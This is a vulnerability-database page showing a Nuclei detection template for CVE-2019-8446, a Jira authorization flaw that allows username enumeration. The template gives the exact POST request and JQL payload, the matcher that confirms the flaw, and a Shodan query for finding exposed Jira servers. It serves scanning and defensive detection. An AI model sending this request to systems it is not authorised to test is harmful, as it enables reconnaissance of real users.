Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2019-8446
HistoryMay 02, 2021 - 7:50 p.m.

Jira Improper Authorization

2021-05-0219:50:57
ProjectDiscovery
github.com
1

5.2 Medium

AI Score

Confidence

High

0.157 Low

EPSS

Percentile

95.9%

JSON

The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.

id: CVE-2019-8446

info:
  name: Jira Improper Authorization
  author: dhiyaneshDk
  severity: medium
  description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.
  impact: |
    This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Jira application.
  remediation: |
    Apply the latest security patches and updates provided by Atlassian to fix the vulnerability.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-69777
    - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/CyberTrashPanda/CVE-2019-8446
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-8446
    cwe-id: CWE-863
    epss-score: 0.15691
    epss-percentile: 0.95925
    cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira_server
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2019,jira,atlassian

http:
  - raw:
      - |
        POST /rest/issueNav/1/issueTable HTTP/1.1
        Host: {{Hostname}}
        Connection: Close
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        X-Atlassian-Token: no-check
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9

        {'jql':'project in projectsLeadByUser("{{randstr}}")'}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "the user does not exist"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cf8c8942f083be4875c7bbade9267ac54350324c7bfd1748aed4ad932b2bc2cd022100e3f56f7eb8cbb5403eec108fafa3bbf6565d45761fa7aa7142b70e2145a10f90:922c64590222798bb761d5b6d8e72950

Related

cve 1
atlassian 2
talos 1
prion 1
cvelist 1
nessus 2
talosblog 1
cve
cve
CVE-2019-8446
2019-08-23 14:15:00
atlassian
atlassian
User enumeration through the issueTable resource - CVE-2019-8446
2019-08-09 03:23:53
User enumeration through the issueTable resource - CVE-2019-8446
2019-08-09 03:23:53
talos
talos
Atlassian Jira issueTable username information disclosure vulnerability
2019-09-16 00:00:00
prion
prion
Authentication flaw
2019-08-23 14:15:00
cvelist
cvelist
CVE-2019-8446
2019-08-13 00:00:00
nessus
nessus
Atlassian JIRA < 8.3.2 Multiple Vulnerabilities
2019-10-04 00:00:00
Atlassian Jira < 8.4.0 Multiple Vulnerabilities
2019-10-09 00:00:00
talosblog
talosblog
Vulnerability Spotlight: Multiple vulnerabilities in Atlassian Jira
2019-09-20 07:26:50

5.2 Medium

AI Score

Confidence

High

0.157 Low

EPSS

Percentile

95.9%

JSON
Related for NUCLEI:CVE-2019-8446
cve1atlassian2talos1prion1cvelist1nessus2talosblog1